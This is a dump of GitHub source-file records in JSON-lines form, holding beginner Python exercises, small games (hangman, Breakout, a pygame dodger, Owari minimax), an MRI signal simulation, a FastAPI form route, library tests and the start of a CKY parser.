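@benchmarked('formant_export')
def do_export(config):
    # Hypothetical stand-in for one of the export functions above.
    time.sleep(0.1)

do_export(config={})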
+{"seq_id":"26582980723","text":"i = 0\nwhile(i <= 5):\n print(\"The value of i is\" , i)\n i += 1 # i = i+1\nprint(\"Finished the program\")\n#print the sum of value\nnum = 1\nsum = 0\nprint(\"Enter any number. Please Enterd the 0 for exit the program\")\nwhile num != 0:\n num = float(input(\"Number ?\"))\n sum = sum + num;\n print(sum)\n# guse number\nimport random\ntarget_num, guess_num = random.randint(1, 10), 0\nwhile target_num != guess_num:\n guess_num = int(input('Guess a number between 1 and 10 until you get it right : '))\nprint('Well guessed!')\n# resvers a string\nword = input(\"Enter any world\")\nfor char in range(len(word) - 1, -1, -1):\n print(word[char], end=\"\")\nprint(\"\\n\")\n\n\n","repo_name":"Quratulainmumtaz/Basic-Python","sub_path":"looping programming.py","file_name":"looping programming.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"26799520417","text":"# CSCE A405 Assignment 3\n# Authors: Vadim Egorov and Jared Vitug\n# Update date: 10/25/2021\n\nfrom Owari import Owari\nfrom MMABP import MMABP\nfrom copy import deepcopy\n\n\n# Decide who is going first\ndef get_first_move(ow):\n while True:\n first_move = input(\n \"Do you want to move first? (Enter: Yes/No, y/n) \\n\")\n\n if first_move.lower() == \"yes\" or first_move.lower() == \"y\":\n print(\"\\nNorth moves first!\")\n break\n elif first_move.lower() == \"no\" or first_move.lower() == \"n\":\n print(\"\\nSouth moves first!\")\n ow.set_turn()\n break\n\n# Play a game with computer\ndef human_vs_computer(ow, depth):\n # Decide who is going first\n get_first_move(ow)\n\n print(\"\\n GAME STARTED\")\n ow.display_board()\n\n while True:\n if ow.turn == \"north\":\n # Make human move\n ow.get_human_move()\n ow.display_board()\n # Change turn\n ow.set_turn()\n else:\n # Get the best move\n pit = MMABP().get_computer_move(deepcopy(ow.board), deepcopy(ow.turn), depth)\n # Make a computer move\n ow.move(pit)\n ow.display_board()\n # change turn\n ow.set_turn()\n\n # Check if game is over\n if ow.game_over():\n print(\"\\nGame Over!!!\")\n ow.display_board()\n break\n\n # Decide a winner\n if ow.board[6] == ow.board[13]:\n print(\"\\n Tie!\")\n elif ow.board[6] > ow.board[13]:\n print(\"\\nSouth won!\")\n else:\n print(\"\\nNorth won!\")\n\ndef human_vs_human(ow):\n get_first_move(ow)\n print(\"\\n GAME STARTED\")\n ow.display_board()\n\n while True:\n # Make human move\n ow.get_human_move()\n ow.display_board()\n # Change turn\n ow.set_turn()\n\n # Check if game is over\n if ow.game_over():\n print(\"\\nGame Over!!!\")\n ow.display_board()\n break\n\n # Decide a winner\n if ow.board[6] == ow.board[13]:\n print(\"\\n Tie!\")\n elif ow.board[6] > ow.board[13]:\n print(\"\\nSouth won!\")\n else:\n print(\"\\nNorth won!\")\n\n\ndef main():\n depth = 10\n # Start a game\n human_vs_computer(Owari(), depth)\n # human_vs_human(Owari())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vadimegorov13/owari_minmax","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"2861468589","text":"class Solution:\n def canJump(self,nums):\n '''\n :type nums:list[int]\n :rtype:bool\n '''\n if not nums: return\n i = len(nums)-2\n while i >= 0:\n if nums[i] == 0:\n needJumps = 1\n while needJumps > nums[i]:\n needJumps += 1;i -= 1\n if i < 0:\n return False\n i -= 1\n return True\ns = 
Solution()\nresult = s.canJump([3,2,1,0,4])\nprint(result)","repo_name":"nihao-hit/leetcode","sub_path":"Jump Game.py","file_name":"Jump Game.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"74173898556","text":"from replit import clear\nimport random\n\nfrom hangman_words import word_list\n\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\n\nend_of_game = False\nlives = 6\n\nfrom hangman_art import logo\nprint(logo)\n\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\n\nwhile not end_of_game:\n guess = input(\"Угадайте букву: \").lower()\n\n clear()\n \n if guess in display:\n print(f\"Вы уже угадали букву {guess}\")\n\n #Check guessed letter\n for position in range(word_length):\n letter = chosen_word[position]\n \n if letter == guess:\n display[position] = letter\n\n \n if guess not in chosen_word:\n \n print(f\"Вы ввели {guess}, но такой буквы нет в слове. У вас уменьшилась жизнь.\")\n \n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\"Вы проиграли :(.\")\n print(f\"Слово было\\n{chosen_word}\")\n\n print(f\"{' '.join(display)}\")\n\n if \"_\" not in display:\n end_of_game = True\n print(\"Вы выиграли!.\")\n\n from hangman_art import stages\n print(stages[lives])\n","repo_name":"fsaidov11/Visielitsa","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18015976268","text":"\nimport random\n\ndef get_n_random_numbers(n=10,min_=-5,max_=5):\n numbers=[]\n for i in range(n):\n numbers.append(random.randint(min_,max_))\n return numbers\n\ndef my_frequency_with_dict(list):\n frequency_dict={}\n for item in list:\n if(item in frequency_dict):\n frequency_dict[item] = frequency_dict[item]+1\n else:\n frequency_dict[item] = 1\n return frequency_dict\n\nmy_list = get_n_random_numbers(10,-8,8)\nsorted(my_list)\nmy_f=my_frequency_with_dict(my_list)\nprint(my_list)\nprint(my_f)\n\n\ndef my_frequency_with_list_of_tuples(list_1):\n frequency_list = []\n for i in range(len(list_1)):\n s=False\n for j in range(len(frequency_list)):\n if(list_1[i]==frequency_list[j][0]):\n frequency_list[j][1]=frequency_list[j][1]+1\n s=True\n if(s==False):\n frequency_list.append([list_1[i],1])\n return frequency_list\n\nresult_1 = my_frequency_with_dict(my_list)\nresult_2 = my_frequency_with_list_of_tuples(my_list)\nprint(result_1,result_2)\n\n\n\n\n\n# mode of a list with histogram\n\ndef my_mode_with_dict(my_hist_d):\n frequency_max = -1\n mode = -1\n for key in my_hist_d.keys():\n print(key,my_hist_d[key])\n if(my_hist_d[key]>frequency_max):\n frequency_max = my_hist_d[key]\n mode=key\n return mode,frequency_max\n\nmy_list_1 = get_n_random_numbers(10)\nmy_hist_d = my_frequency_with_dict(my_list_1)\nmy_hist_l=my_frequency_with_list_of_tuples(my_list_1)\n\nprint(my_mode_with_dict(my_hist_d))\n\n\n\n\n\n# mode of a list with histogram (a list of tuples)\n\ndef my_mode_with_list(my_hist_list):\n frequency_max = -1\n mode = -1\n for item,frequency in my_hist_list:\n print(item,frequency)\n if(frequency>frequency_max):\n frequency_max = frequency\n mode=item\n return mode,frequency_max\n\nmy_list_100 = get_n_random_numbers(20,-4,4)\nmy_hist_l=my_frequency_with_list_of_tuples(my_hist_l)\nprint(my_mode_with_list(my_hist_l))\n\n\n\n\n#linear search on list\n\ndef my_linear_searh(my_list,item_search):\n found=(-1,-1)\n n=len(my_list)\n 
for indis in range(n):\n if my_list[indis] == item_search:\n found=(my_list[indis],indis)\n return found\n\nmy_list = get_n_random_numbers(10,-5,5)\nprint(my_linear_searh(my_list,10))\n\n\n#mean of list\n\ndef my_mean():\n s,t=0,0\n for item in my_list:\n s=s+1\n t=t+item\n mean_ = t/s\n return mean_\n\nmy_list = get_n_random_numbers(4,-5,5)\nprint(my_mean(my_list))\n\n\n\n\n#sort the list\n\ndef my_bubble_sort(my_list):\n n=len(my_list)\n for i in range(n-1,-1,-1):\n for j in range(0,i):\n if not(my_list[j]item_search):\n high = mid-1\n else:\n low=mid+1\n return found\n\n\n\n#median of a list\n\nsize=input(\"dizi boyutunu giriniz\")\nsize=int(size)\nmy_list_1=get_n_random_numbers(size)\n\nprint(\"liste \",my_list_1)\n\ndef my_median(my_list):\n my_list_2 = my_bubble_sort(my_hist_l)\n #print(my_list_2)\n n=len(my_list_2)\n if(n%2==1):\n middle=int(n/2)+1\n median = my_list_2[middle-1]\n #print(median)\n\n else:\n middle_1= int(n/2)\n middle_2= middle_1+1\n median= (my_list_2[middle_1]+my_list_2[middle_2])/2\n #print(median)\n return median\n\nmy_list_2 = get_n_random_numbers(5,-10,10)\nprint(my_median(my_list_2))\n\n\n\n\n\n","repo_name":"akifselbii/SchoolProjects","sub_path":"ProgramlamaDersi/algs_week_1/algs_week_1.py","file_name":"algs_week_1.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11251729266","text":"# [게임 조건]\n# 1. 캐릭터는 화면 가장 아래에 위치, 좌우로만 이동 가능\n# 2. 똥은 화면 가장 위에서 떨어짐. x 좌표는 매번 랜덤으로 설정\n# 3. 캐릭터가 똥을 피하면 다음 똥이 떨어짐\n# 4. 캐릭터가 똥과 충돌하면 게임 종료\n# 5. FPS는 30으로 고정\n\n# [게임 이미지]\n# 1. 배경 640 * 480 (세, 가)\n# 2. 캐릭터, 똥 70 * 70\n###############################################################################\n\nfrom turtle import screensize\nimport pygame\nimport random as r\n\npygame.init() #초기화 (반드시 필요한 작업)\n\n#화면 크기 설정\nscreen_width = 480\nscreen_height = 640\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n#화면 제목 설정\npygame.display.set_caption(\"따라 만든 게임 1\")\n\n# FPS\nclock = pygame.time.Clock()\n\n# 1. 사용자 게임 초기화 (배경 화면, 게임 이미지, 폰트, 좌표 etc...)\n\n#배경 불러오기\nbackground = pygame.image.load(\"C:/python master/bg.png\")\n\n#캐릭터 불러오기\ncharacter = pygame.image.load(\"C:/python master/char.png\")\ncharacter_size = character.get_rect().size\ncharacter_width = character_size[0]\ncharacter_height = character_size[1]\ncharacter_x_pos = (screen_width / 2) - (character_width / 2)\ncharacter_y_pos = screen_height - character_height\n\n#이동할 좌표\nto_x = 0\nto_y = 0\n\n#이동 속도\ncharacter_speed = 0.6\nenemy_speed = r.randint(1,10)\n\n# 적 캐릭터\n\nenemy = pygame.image.load(\"C:/python master/enemy.png\")\nenemy_size = enemy.get_rect().size\nenemy_width = enemy_size[0]\nenemy_height = enemy_size[1]\nenemy_x_pos = r.randint(0, screen_width - enemy_width)\nenemy_y_pos = 0\n\n# 폰트 정의\ngame_font = pygame.font.Font(None, 40)\n\n# 이벤트 루프\nrunning = True\nwhile running:\n dt = clock.tick(30) #초당 프레임 수 설정\n print(\"fps: \" + str(clock.get_fps()))\n\n#2. 이벤트 처리 (키보드, 마우스 etc...) \n for event in pygame.event.get(): #어떤 이벤트가 발생하였는가?\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n to_x -= character_speed\n elif event.key == pygame.K_RIGHT:\n to_x += character_speed\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n to_x = 0\n\n# 3. 
게임 캐릭터 위치 정의 \n character_x_pos += to_x * dt\n enemy_y_pos += 10\n \n if character_x_pos < 0:\n character_x_pos = 0\n elif character_x_pos > screen_width - character_width:\n character_x_pos = screen_width - character_width\n \n if enemy_y_pos > screen_height:\n enemy_y_pos = 0\n enemy_x_pos = r.randint(0, screen_width - enemy_width)\n \n# 4. 충돌 처리\n character_rect = character.get_rect()\n character_rect.left = character_x_pos\n character_rect.top = character_y_pos\n \n enemy_rect = enemy.get_rect()\n enemy_rect.left = enemy_x_pos\n enemy_rect.top = enemy_y_pos\n \n # 충돌 확인\n if character_rect.colliderect(enemy_rect):\n print(\"충돌했습니다.\")\n running = False\n \n# 5. 화면에 그리기 \n screen.blit(background, (0,0)) \n screen.blit(character, (character_x_pos, character_y_pos)) \n screen.blit(enemy, (enemy_x_pos, enemy_y_pos)) # 적 그리기\n \n pygame.display.update()\n\npygame.time.delay(500)\n\npygame.quit()","repo_name":"Clue03/Falling-Block","sub_path":"Pygame/pygame_basic/Quiz_Answer.py","file_name":"Quiz_Answer.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74419838076","text":"import numpy as np\n\nfrom numpy import pi\n\nfrom matplotlib import pyplot as plt\nimport epg\nfrom epg import cpmg_epg, cpmg_epg_b1\nimport timeit\n\ndef epg_grad(FpFmZ, noadd=0):\n# if noadd == 0:\n# FpFmZ = np.concatenate((FpFmZ,np.zeros((3,1))), axis=1)\n\n FpFmZ[0,:] = np.roll(FpFmZ[0,:], 1)\n FpFmZ[1,:] = np.roll(FpFmZ[1,:],-1)\n FpFmZ[1,-1] = 0\n FpFmZ[0,0] = np.conjugate(FpFmZ[1,0])\n\n return(FpFmZ)\n\n\ndef epg_grelax( FpFmZ, T1, T2, T, kg = 0, D = 0, Gon = 1, noadd = 0):\n\n E1 = np.exp(-T/T1)\n E2 = np.exp(-T/T2)\n\n EE = np.diag([E2, E2, E1])\n RR = 1.0-E1\n\n FpFmZ = np.dot( EE, FpFmZ)\n\n FpFmZ[2,0] = FpFmZ[2,0]+RR\n\n# print(EE)\n# print('RR=',RR)\n# print('FpFmZ=\\n',FpFmZ[:,:4].real)\n\n ##Assume Gradient is on and kg >= 0\n\n FpFmZ = epg_grad(FpFmZ, noadd)\n\n\n return(FpFmZ)\n\n\ndef epg_rf( FpFmZ, alpha, phi ):\n\n RR = np.zeros((3,3), dtype = np.complex128)\n\n RR[0,0] = np.cos(alpha/2.)**2\n RR[0,1] = np.exp(2.0*1j*phi)*(np.sin(alpha/2.0))**2\n RR[0,2] = -1j*np.exp(1j*phi)*np.sin(alpha)\n\n RR[1,0] = np.exp(-2j*phi)*(np.sin(alpha/2.0))**2\n RR[1,1] = (np.cos(alpha/2.0))**2\n RR[1,2] = 1j*np.exp(-1j*phi)*np.sin(alpha)\n\n RR[2,0] = (-1j/2.0)*np.exp(-1j*phi)*np.sin(alpha)\n RR[2,1] = ( 1j/2.0)*np.exp( 1j*phi)*np.sin(alpha)\n RR[2,2] = np.cos(alpha)\n\n FpFmZ = np.dot(RR, FpFmZ)\n\n return( FpFmZ, RR)\n\n\ndef rf_pulse( alpha, phi ):\n\n RR = np.zeros((3,3), dtype = np.complex128)\n\n RR[0,0] = np.cos(alpha/2.)**2\n RR[0,1] = np.exp(2.0*1j*phi)*(np.sin(alpha/2.0))**2\n RR[0,2] = -1j*np.exp(1j*phi)*np.sin(alpha)\n\n RR[1,0] = np.exp(-2j*phi)*(np.sin(alpha/2.0))**2\n RR[1,1] = (np.cos(alpha/2.0))**2\n RR[1,2] = 1j*np.exp(-1j*phi)*np.sin(alpha)\n\n RR[2,0] = (-1j/2.0)*np.exp(-1j*phi)*np.sin(alpha)\n RR[2,1] = ( 1j/2.0)*np.exp( 1j*phi)*np.sin(alpha)\n RR[2,2] = np.cos(alpha)\n\n\n return(RR)\n\ndef cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 ):\n\n\n P = np.zeros((3,2*Nechos),dtype=np.complex128)\n\n P[0,0] = 0.0 # Fp\n P[1,0] = 0.0 # Fm\n P[2,0] = 1.0 # Z\n\n signal = np.zeros(Nechos)\n\n rf_pulse90_rad = np.pi*rf_180/360.\n #rf_pulse90_rad = np.pi*90.0/180.\n rf_pulse_rad = np.pi*rf_180/180.\n\n RR90 = rf_pulse(rf_pulse90_rad, np.pi/2.0)\n RR180 = rf_pulse(rf_pulse_rad, 0.0)\n\n P = np.dot( RR90, P )\n #signal[0] = P[0,0].real\n\n for echo in range(Nechos):\n P = epg_grelax( 
P, T1, T2, Techo/2.0)\n P = np.dot(RR180,P)\n P = epg_grelax( P, T1, T2, Techo/2.0)\n\n signal[echo] = (P[0,0].real)\n\n return(signal)\n\n\n\nif __name__ == \"__main__\":\n\n Nechos=17\n T1=3000.0\n T2=50.0\n T = 10.0\n P180 = 120.0\n\n signal = np.zeros(Nechos)\n #signal = [0.0]*Nechos\n xxx = np.arange( T, T*(Nechos+1), T )\n\n #xxx = np.arange(1,18)*10.0\n yyy = np.zeros(17, dtype=np.float64)\n\n ttt_c = timeit.timeit('cpmg_epg_b1( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0, 1.0 )', setup=\"from __main__ import cpmg_epg_b1, yyy, pi\", number=10000)\n ttt_c = timeit.timeit('cpmg_epg_b1( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0, 1.0 )', setup=\"from __main__ import cpmg_epg_b1, yyy, pi\", number=10000)\n print(\"Time to execute cpmg_epg_b1 C++ function 10000 times: {:5.2f} s\".format( ttt_c))\n\n ttt_py = timeit.timeit('cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 )', setup=\"from __main__ import cpmg_epg_py\", number=10000)\n print(\"Time to execute cpmg_ep python function 10000 times: {:5.2f} s\".format( ttt_py))\n\n print(\"Ratio of Python to C++ {:5.2f}\".format(ttt_py/ttt_c))\n epg.cpmg_epg( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0 )\n\n yyy_py = cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 )\n\n\n print(help(cpmg_epg_b1))\n\n plt.plot(xxx, yyy, 'o-', label='c')\n plt.plot(xxx, yyy_py, label ='py')\n plt.xlabel('time [ms]')\n plt.ylabel('signal')\n plt.title( 'RF pulse = 120$^o$ speed up factor {:5.2f}'.format(ttt_py/ttt_c))\n plt.legend()\n plt.show();","repo_name":"EricHughesABC/EPG","sub_path":"examples/run_epg.py","file_name":"run_epg.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"5877948501","text":"#!/usr/bin/env python\nimport argparse\n\nparser = argparse.ArgumentParser(description='kawazanyou')\n\nparser.add_argument('-i', '--initial',\n required=True,\n type=int,\n help='Initial value')\nparser.add_argument('-r', '--rate',\n required=True,\n type=int,\n help='Annual interest rate')\nparser.add_argument('-s', '--saving',\n required=True,\n type=int,\n help=\"Annual saving\")\nparser.add_argument('-t', '--term',\n required=True,\n type=int, help=\"term\")\nparser.add_argument('-d', '--debug',\n required=False,\n action='store_true',\n help=\"debug mode\")\n\n\nargs = parser.parse_args()\n\ninitial = args.initial\nrate = args.rate\nsaving = args.saving\nterm = args.term\ndebug = args.debug\n\n\nif debug:\n print('initial : {}'.format(initial))\n print('rate : {} %'.format(rate))\n print('saving : {}'.format(saving))\n print('term : {} year'.format(term))\n\nactual = initial\n\nprint('year, actual, profit')\n\nfor var in range(0, term):\n total_saving_amount = saving * 12\n actual += total_saving_amount\n profit = actual * (rate / 100)\n actual += profit\n print('{},{},{}'.format(var, actual, profit))\n","repo_name":"nasum/python-scripts","sub_path":"kawazanyou/kawazanyou.py","file_name":"kawazanyou.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"201876287","text":"import copy\nimport logging\nfrom datetime import datetime\n\nfrom autologging import traced\nfrom fastapi import Form\nfrom starlette.responses import HTMLResponse\n\nfrom api import autils\nfrom app import APP\nfrom core.use_cases.zacni_vclanitveni_postopek import Zacni_vclanitveni_postopek, StatusVpisa\n\nrouter = autils.router(__name__)\nlog = 
logging.getLogger(__name__)\n\n\n@traced\n@router.post(\"/vpis\", response_class=HTMLResponse)\nasync def vpis(\n\t\time: str = Form(min_length=2), priimek: str = Form(min_length=2),\n\t\tdan_rojstva: int = Form(ge=1, le=31), mesec_rojstva: int = Form(ge=1, le=12),\n\t\tleto_rojstva: int = Form(ge=datetime.now().year - 120, le=datetime.now().year),\n\t\temail: str = Form(min_length=3), telefon: str = Form(min_length=4),\n\t\time_skrbnika: str | None = Form(None, min_length=2), priimek_skrbnika: str | None = Form(None, min_length=2),\n\t\temail_skrbnika: str | None = Form(None, min_length=3), telefon_skrbnika: str | None = Form(None, min_length=3)):\n\tkwargs = copy.copy(locals())\n\n\tforms_vpis: Zacni_vclanitveni_postopek = APP.use_case.zacni_vclanitveni_postopek()\n\n\tstatus: StatusVpisa = await forms_vpis.exe(**kwargs)\n\tlog.info(status)\n\n\ttemp = template.init(**{**kwargs, **{'kontakti': [k.token_data for k in status.validirani_podatki]}})\n\tif TipPrekinitveVpisa.HACKER in status.razlogi_prekinitve:\n\t\treturn HTMLResponse(content=temp.warn_prekrsek, status_code=400)\n\telif TipPrekinitveVpisa.NAPAKE in status.razlogi_prekinitve:\n\t\ttemp.napake = [k.token_data for k in status.napacni_podatki_skrbnika + status.napacni_podatki_clana]\n\t\treturn HTMLResponse(content=temp.warn_napaka, status_code=400)\n\telif TipPrekinitveVpisa.CHUCK_NORIS in status.razlogi_prekinitve:\n\t\treturn HTMLResponse(content=temp.warn_chuck_noris)\n\n\t# POSILJANJE POTRDITVENEGA EMAILA\n\treturn HTMLResponse(content=temp.web_vpis_sprejeto, status_code=200)\n\n\n@traced\n@router.post(\"/izpis\")\ndef izpis():\n\treturn {}\n\n\n@traced\n@router.post('/kontakt')\ndef kontakt():\n\treturn {'kontakt': True}\n","repo_name":"Programerski-klub-Ljubljana/API_programerski-klub.si-deprecated-","sub_path":"api/routes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18816517575","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.utils.translation import get_language\nfrom app_projects.models import Project\nfrom app_cms.utils.revers_path import revers_page_path\nimport json\n\ndef group_technologies_by_type(technologies):\n technology_grouped = {}\n for tech in technologies:\n group = technology_grouped.get(tech.type.name, [])\n group.append(tech)\n technology_grouped[tech.type.name] = group\n return technology_grouped\n\ndef process(request, config, context, *args):\n slug = args[0][0]\n lang = get_language()\n\n\n projects = Project.objects.filter(translations__slug=slug, translations__language_code=lang)\n\n if not slug or not len(projects):\n path = '/'.join(request.path.split('/')[:-1])\n return {\n 'redirect': path\n }\n\n project = projects[0]\n\n context['project'] = project\n context['project_technologies'] = group_technologies_by_type(projects[0].technology.all().order_by('type__weight'))\n if project.meta_title and project.meta_description:\n context['page_meta'] = {\n 'meta_title': project.meta_title,\n 'meta_description': project.meta_description,\n 'title': project.title,\n 'locale': get_language(),\n 'image': {\n 'url': project.gallery.images[0].image.thumb,\n 'type': 'image/png',\n 'width': project.gallery.images[0].width,\n 'height': project.gallery.images[0].height,\n 'alt': project.gallery.images[0].alt,\n }\n }\n context['json_ld'] = project.json_ld\n return 
context","repo_name":"robert8888/portfolio","sub_path":"app_projects/views/section_project.py","file_name":"section_project.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42015349264","text":"# Faça um programa que leia o peso de cinco pessoas.\r\n# No final, mostre qual foi o maior e o menor peso lidos.\r\nc = 0\r\nmaiorpeso = 0\r\nmenorpeso = 1000\r\nfor pers in range(1, 6):\r\n c += 1\r\n peso = float(input(f'Quanto a {c}° pessoa pesa?: '))\r\n print('-'*33)\r\n if peso > maiorpeso:\r\n maiorpeso = peso\r\n\r\n if peso < menorpeso:\r\n menorpeso = peso\r\n\r\nprint(f'O maior peso digitador foi: \\033[31m{maiorpeso}kg\\033[m \\nO menor peso digitado foi: \\033[31m{menorpeso}kg\\033[m')\r\n","repo_name":"MattDF4/Curso-em-Video-Python-ex","sub_path":"Ex- 055.py","file_name":"Ex- 055.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7385322280","text":"#!/usr/bin/python3\n\nimport multiprocessing as mp\nimport os\nimport random\nimport time\n\ndef go_sleep():\n value = random.randrange(1, 10)\n time.sleep(value)\n print(\"[%d] awoken after %ds\" % (mp.current_process().pid, value))\n\npool = [mp.Process(target=go_sleep) for _ in range(10)]\n\nfor elt in pool:\n elt.start()\n\nfor _ in range(10):\n pid, _ = os.wait()\n print(\"[prnt] process %d done\" % (pid))\n\nfor elt in pool:\n elt.join()","repo_name":"uvsq22101252/Python_semestre_4","sub_path":"IN405/TD5/corection/easy-msleep.py","file_name":"easy-msleep.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9370378137","text":"\"\"\"\nTesting of the iterative module\n\n\"\"\"\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_allclose\n\nimport pyoperators\nfrom pyoperators import IdentityOperator\nfrom pyoperators.iterative.algorithms import acg\nfrom pyoperators.iterative.cg import PCGAlgorithm, pcg\nfrom pyoperators.utils.testing import assert_same\n\n# collection of definite positive symmetric linear operators to test\nOPERATORS = [\n pyoperators.DiagonalOperator(np.random.rand(16)),\n pyoperators.TridiagonalOperator(np.arange(1, 17), np.arange(1, 16)),\n]\n\n# collection of vectors\nVECTORS = [np.ones(16), np.arange(1, 17)]\n\n# collection of old solvers\nMETHODS = [acg]\n\n# collection of solvers\nCLASSES = [PCGAlgorithm]\nSOLVERS = [pcg]\n\n\n@pytest.mark.xfail(reason='reason: Unknown.')\n@pytest.mark.parametrize('operator', OPERATORS)\n@pytest.mark.parametrize('vector', VECTORS)\n@pytest.mark.parametrize('method', METHODS)\ndef test_methods_inv(operator, vector, method):\n y = operator * vector\n xe = method(operator, y, maxiter=100, tol=1e-7)\n assert_same(vector, xe)\n\n\n@pytest.mark.parametrize('operator', OPERATORS)\n@pytest.mark.parametrize('vector', VECTORS)\n@pytest.mark.parametrize('cls', CLASSES)\ndef test_classes_inv(operator, vector, cls):\n y = operator(vector)\n algo = cls(operator, y, maxiter=100, tol=1e-7)\n xe = algo.run()\n assert_allclose(vector, xe, rtol=1e-5)\n\n\n@pytest.mark.parametrize('solver', SOLVERS)\n@pytest.mark.parametrize('vector', VECTORS)\ndef test_solution_as_x0(solver, vector):\n solution = solver(IdentityOperator(shapein=vector.shape), vector, x0=vector)\n assert_same(solution['nit'], 0)\n assert_same(solution['x'], 
vector)\n","repo_name":"pchanial/pyoperators","sub_path":"tests/test_iterative.py","file_name":"test_iterative.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"10019703837","text":"\"\"\"\nstanCode Breakout Project\nAdapted from Eric Roberts's Breakout by\nSonja Johnson-Yu, Kylie Jue, Nick Bowman,\nand Jerry Liao.\n\nHand-in person: Jacky\n\"\"\"\n\nfrom campy.gui.events.timer import pause\nfrom breakoutgraphics import BreakoutGraphics\n\nFRAME_RATE = 10 # 100 frames per second\nNUM_LIVES = 3\t\t\t# Number of attempts\n\n# import moving step from Class\nvx = BreakoutGraphics.get_vx()\nvy = BreakoutGraphics.get_vy()\n\n\ndef main():\n \"\"\"\n After run the program, a window with bricks, a ball, and a paddle will be shown. The game can be started once\n gamer click his/her mouse. The ball will be dropped in a random direction and gamer needs to prevent the ball drops\n out the bottom edge of the window. Once the ball has dropped out the window, it will return back to its original\n position waiting next click to start. The player has 3 chances to eliminate all bricks to win the game.\n \"\"\"\n global vx, vy\n graphics = BreakoutGraphics()\n lives = NUM_LIVES\n brick_remain = graphics.brick_num\n\n while True:\n if lives > 0 and graphics.switch is True:\n graphics.ball.move(vx, vy)\n # set boundary conditions for top, left, and right edges\n if graphics.ball.x+graphics.ball.width > graphics.window.width or graphics.ball.x < 0:\n vx = -vx\n if graphics.ball.y < 0:\n vy = -vy\n # set boundary condition for bottom edge and reset the game once player fail to catch the ball\n elif graphics.ball.y > graphics.window.height:\n graphics.switch = False\n graphics.window.remove(graphics.ball)\n graphics.window.add(graphics.ball, x=(graphics.window.width-graphics.ball.width)/2,\n y=(graphics.window.height-graphics.ball.height)/2)\n vx = BreakoutGraphics.get_vx()\n lives -= 1\n\n # rebound condition and erase bricks if the ball hit them and rebound if hit the paddle\n flag = False\n for i in range(2):\n if flag is True:\n break\n for j in range(2):\n obj = graphics.window.get_object_at(graphics.ball.x + i*graphics.ball.width, graphics.ball.y +\n j*graphics.ball.height)\n if obj is not None:\n if obj is graphics.paddle:\n vy = -BreakoutGraphics.get_vy()\n else:\n graphics.window.remove(obj)\n brick_remain -= 1\n rebound()\n flag = True\n break\n\n if brick_remain == 0:\n break\n\n pause(FRAME_RATE)\n\n\ndef rebound():\n \"\"\"\n rebound function\n \"\"\"\n global vx, vy\n vy = -vy\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jackywu23/project-stanCode","sub_path":"Stancode_project/Breakout game/breakout.py","file_name":"breakout.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26663142663","text":"\"\"\"\r\nKim Dodds - LING 571 - Winter 2020\r\nHW 4 Implementation File\r\n\r\nThe purpose of this project is to implement\r\na CYK parser for a fragment of the ATIS corpus.\r\n\"\"\"\r\n\r\n#PREPROCESSOR DIRECTIVES\r\nimport sys\r\nimport os\r\nimport re\r\nimport nltk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom collections import Counter\r\nimport math\r\n\r\nclass CKYIndex:\r\n index = None\r\n terminal = None\r\n nonterminal = None\r\n\r\n def __init__(self):\r\n self.index = []\r\n self.terminal = ''\r\n self.nonterminal = []\r\n\r\nclass CKYParser:\r\n left_right = 
